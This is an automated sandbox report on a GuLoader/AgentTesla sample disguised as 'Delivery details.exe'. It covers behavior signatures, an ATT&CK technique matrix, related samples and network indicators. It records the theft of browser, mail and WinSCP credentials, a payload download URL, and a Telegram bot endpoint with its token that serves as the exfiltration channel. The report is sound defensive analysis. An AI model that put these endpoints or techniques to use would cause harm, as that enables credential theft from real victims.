              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Delivery details.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR
              Source: Yara matchFile source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: Yara matchFile source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR
              Source: Yara matchFile source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              3
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              1
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              26
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell
              Logon Script (Windows)111
              Process Injection
              1
              Obfuscated Files or Information
              1
              Credentials in Registry
              321
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Process Discovery
              Distributed Component Object Model11
              Input Capture
              3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets251
              Virtualization/Sandbox Evasion
              SSH2
              Clipboard Data
              14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
              Process Injection
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1409546 Sample: Delivery details.exe Startdate: 15/03/2024 Architecture: WINDOWS Score: 100 34 api.telegram.org 2->34 36 mzu7.sa.com 2->36 38 api.ipify.org 2->38 48 Snort IDS alert for network traffic 2->48 50 Found malware configuration 2->50 52 Multi AV Scanner detection for dropped file 2->52 56 6 other signatures 2->56 8 Delivery details.exe 1 26 2->8         started        signatures3 54 Uses the Telegram API (likely for C&C communication) 34->54 process4 file5 24 C:\Users\user\AppData\...\Kbslaaende.Fri, ASCII 8->24 dropped 58 Suspicious powershell command line found 8->58 12 powershell.exe 19 8->12         started        signatures6 process7 file8 26 C:\Users\user\...\Delivery details.exe, PE32 12->26 dropped 60 Obfuscated command line found 12->60 62 Writes to foreign memory regions 12->62 64 Hides threads from debuggers 12->64 66 Powershell drops PE file 12->66 16 wab.exe 15 8 12->16         started        20 conhost.exe 12->20         started        22 cmd.exe 1 12->22         started        signatures9 process10 dnsIp11 28 mzu7.sa.com 162.240.109.7, 443, 49714 UNIFIEDLAYER-AS-1US United States 16->28 30 api.telegram.org 149.154.167.220, 443, 49716, 49717 TELEGRAMRU United Kingdom 16->30 32 api.ipify.org 104.26.13.205, 443, 49715 CLOUDFLARENETUS United States 16->32 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->40 42 Tries to steal Mail credentials (via file / registry access) 16->42 44 Tries to harvest and steal browser information (history, passwords, etc) 16->44 46 2 other signatures 16->46 signatures12

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Delivery details.exe14%VirustotalBrowse
              Delivery details.exe13%ReversingLabsWin32.Trojan.Guloader
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe13%ReversingLabsWin32.Trojan.Guloader
              C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe14%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              mzu7.sa.com0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://mzu7.sa.com/AqtYsvzFN55.bin2C0%Avira URL Cloudsafe
              https://mzu7.sa.com/AqtYsvzFN55.bin0%Avira URL Cloudsafe
              https://mzu7.sa.com/0%Avira URL Cloudsafe
              https://mzu7.sa.com/AqtYsvzFN55.bin0%VirustotalBrowse
              https://mzu7.sa.com/0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              mzu7.sa.com
              162.240.109.7
              truefalseunknown
              api.ipify.org
              104.26.13.205
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    high
                    https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocumentfalse
                      high
                      https://mzu7.sa.com/AqtYsvzFN55.binfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.ipify.orgwab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://mzu7.sa.com/AqtYsvzFN55.bin2Cwab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://nsis.sf.net/NSIS_ErrorErrorDelivery details.exe, Delivery details.exe.2.drfalse
                            high
                            https://api.telegram.orgwab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021427000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://api.ipify.org/twab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://api.telegram.orgwab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.000000002146B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://mzu7.sa.com/wab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    api.telegram.orgUnited Kingdom
                                    62041TELEGRAMRUfalse
                                    162.240.109.7
                                    mzu7.sa.comUnited States
                                    46606UNIFIEDLAYER-AS-1USfalse
                                    104.26.13.205
                                    api.ipify.orgUnited States
                                    13335CLOUDFLARENETUSfalse
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1409546
                                    Start date and time:2024-03-15 12:35:08 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 56s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Delivery details.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@8/15@3/3
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 53
                                    • Number of non-executed functions: 26
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target wab.exe, PID 4400 because it is empty
                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    TimeTypeDescription
                                    12:35:56API Interceptor43x Sleep call for process: powershell.exe modified
                                    12:36:32API Interceptor713684x Sleep call for process: wab.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    149.154.167.220FedEx Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                                      1C24TGL_00000531.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        1C24TGL_00000531.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          1C24TTC_00000020.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            MT103_VPB202403150000003392.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              Delivery Information.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                2257HVL2300001691.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                    E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                      o03y1GwhRQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        162.240.109.7SALARY_RECEIPT.exeGet hashmaliciousGuLoaderBrowse
                                                          Delivery note.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            2257HVL2300001691.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              Admin_review.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                104.26.13.205E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                                • api.ipify.org/
                                                                E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                                • api.ipify.org/
                                                                SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                                • api.ipify.org/
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                api.ipify.orgPO1082N0297.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                PO1876.xlsGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                VAN3065008.xlsGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                DHL AWB TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                FedEx Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                DHL AWB 00542011 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                Salary_receipt.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 104.26.12.205
                                                                rVOLMI-008-24SG.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 104.26.12.205
                                                                rFATURA2024-001.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                PUK ITALIA PO 120610549.EXE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 104.26.12.205
                                                                mzu7.sa.comSALARY_RECEIPT.exeGet hashmaliciousGuLoaderBrowse
                                                                • 162.240.109.7
                                                                Delivery note.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 162.240.109.7
                                                                2257HVL2300001691.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 162.240.109.7
                                                                Admin_review.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 162.240.109.7
                                                                api.telegram.orgFedEx Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 149.154.167.220
                                                                1C24TGL_00000531.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                1C24TGL_00000531.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                1C24TTC_00000020.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                MT103_VPB202403150000003392.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                Delivery Information.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 149.154.167.220
                                                                2257HVL2300001691.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 149.154.167.220
                                                                E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                o03y1GwhRQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 149.154.167.220
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                TELEGRAMRUFedEx Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 149.154.167.220
                                                                1C24TGL_00000531.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                1C24TGL_00000531.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                1C24TTC_00000020.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                MT103_VPB202403150000003392.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 149.154.167.220
                                                                Delivery Information.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 149.154.167.220
                                                                2257HVL2300001691.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 149.154.167.220
                                                                E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                o03y1GwhRQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 149.154.167.220
                                                                CLOUDFLARENETUSSecuriteInfo.com.ELF.Mirai-AJJ.29298.29842.elfGet hashmaliciousMiraiBrowse
                                                                • 172.64.148.116
                                                                https://google.co.za/amp/kirikkaledemasaj.xyz/Ho3GG/sHiTcmFkb3NsYXcubWF6dXJAa2dobS5jb20=Get hashmaliciousCaptcha PhishBrowse
                                                                • 172.67.183.186
                                                                SecuriteInfo.com.Trojan.Linux.Mirai.16314.15376.elfGet hashmaliciousMiraiBrowse
                                                                • 104.22.78.248
                                                                https://mkmkti.indiaawsdna.equipment/rxzt/mardz/z/#?service=ZGlhbmUubWFsYm9ldWZAY2dpLmNvbSZkZGMmYw==Get hashmaliciousUnknownBrowse
                                                                • 104.17.2.184
                                                                file.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro StealerBrowse
                                                                • 172.67.196.214
                                                                PO1082N0297.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                RECH31683168.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • 104.26.1.231
                                                                https://cloudflare-ipfs.com/ipfs/bafkreiggxtldaangicvpjo2q6jvkm4yftayolo7yjc4gqxymzo5tjdvfum?filename=Inbox.html#flikkerop@eur.nlGet hashmaliciousHTMLPhisherBrowse
                                                                • 172.67.139.119
                                                                https://www.google.com/url?rct=j&sa=t&url=https://taideroy.shop/xgenorjrcfbyccd&ct=ga&cd=CAEYACoTOTM4MjY0NjY4MTMxODkwNDQ4MjIaNzk5OWIzOWI5OWZlNDY2OTpjb206ZW46VVM&usg=AOvVaw3oBYO9ct6U-nJjUu73iXVuGet hashmaliciousUnknownBrowse
                                                                • 172.67.182.158
                                                                https://www.thestarnewstoday.com/Get hashmaliciousUnknownBrowse
                                                                • 104.26.15.166
                                                                UNIFIEDLAYER-AS-1USSALARY_RECEIPT.exeGet hashmaliciousGuLoaderBrowse
                                                                • 162.240.109.7
                                                                https://t.uk.nespresso.com/r/?id=h859505ee,590c6122,56f60c49&p1=klask%E3%80%82co.uk/css#7509Y2xhcmEuZGliZXJuYXJkb0BrZWxsZXJoYWxzLWNhcnJhcmQuY2g=??FAXAGFAXAG=Y2xhcmEuZGliZXJuYXJkb0BrZWxsZXJoYWxzLWNhcnJhcmQuY2g=/..=IDQGDYCA&u=276b8dda4ef94158348d5b6b8&id=6b7205781dGet hashmaliciousFake CaptchaBrowse
                                                                • 192.185.75.165
                                                                logo trademark license agreement 97698.jsGet hashmaliciousUnknownBrowse
                                                                • 162.241.248.20
                                                                https://google.co.za/amp/s/smsfrica.com/g004k/ZnJhbmNvaXMuamFjcXVlc0Bhc3NuYXQucWMuY2E=Get hashmaliciousUnknownBrowse
                                                                • 192.185.112.107
                                                                http://zerpcon.com/nxgtnrtn/imgsdollGet hashmaliciousUnknownBrowse
                                                                • 162.241.114.35
                                                                https://solartechnology.com/Get hashmaliciousUnknownBrowse
                                                                • 108.179.228.32
                                                                http://zerpcon.comGet hashmaliciousUnknownBrowse
                                                                • 162.241.114.35
                                                                https://brandequity.economictimes.indiatimes.com/etl.php?url=conocepuertorico.com/JEEZ/FANTOO/2ALwh1DTJi/ZmphY29ic29uQHJvc2VueWMuY29tGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                • 69.49.228.234
                                                                https://brandequity.economictimes.indiatimes.com/etl.php?url=//zerpcon.com/nxgtnrtn/imgsdoll#a2VuZHJhLmdvdWRyZWF1QGdsb2JhbGZvdW5kcmllcy5jb20=Get hashmaliciousUnknownBrowse
                                                                • 162.241.114.35
                                                                PUK ITALIA PO 120610549.EXE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 192.254.186.165
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0ePO1082N0297.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                RECH31683168.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                AvVRnJAfRJ.exeGet hashmaliciousQuasarBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                logo trademark license agreement 97698.jsGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                logo trademark license agreement 97698.jsGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                DHL AWB TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                FedEx Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                DHL AWB 00542011 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                1C24MYC_00225253.pdf.exeGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                1C24MYC_00225253.exeGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                • 104.26.13.205
                                                                37f463bf4616ecd445d4a1937da06e19Patch_MB_5.x.exeGet hashmaliciousUnknownBrowse
                                                                • 162.240.109.7
                                                                RDPWInst-v1.6.2.msiGet hashmaliciousUnknownBrowse
                                                                • 162.240.109.7
                                                                vGPoWZM3lZ.exeGet hashmaliciousAmadeyBrowse
                                                                • 162.240.109.7
                                                                Salary_receipt.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 162.240.109.7
                                                                rVOLMI-008-24SG.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 162.240.109.7
                                                                Details And Invoices.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 162.240.109.7
                                                                file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                • 162.240.109.7
                                                                1320743.lnkGet hashmaliciousUnknownBrowse
                                                                • 162.240.109.7
                                                                Salary_receipt.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 162.240.109.7
                                                                Scanned Purchase Copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 162.240.109.7
                                                                No context
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):8003
                                                                Entropy (8bit):4.838950934453595
                                                                Encrypted:false
                                                                SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                                MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                                SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                                SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                                SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
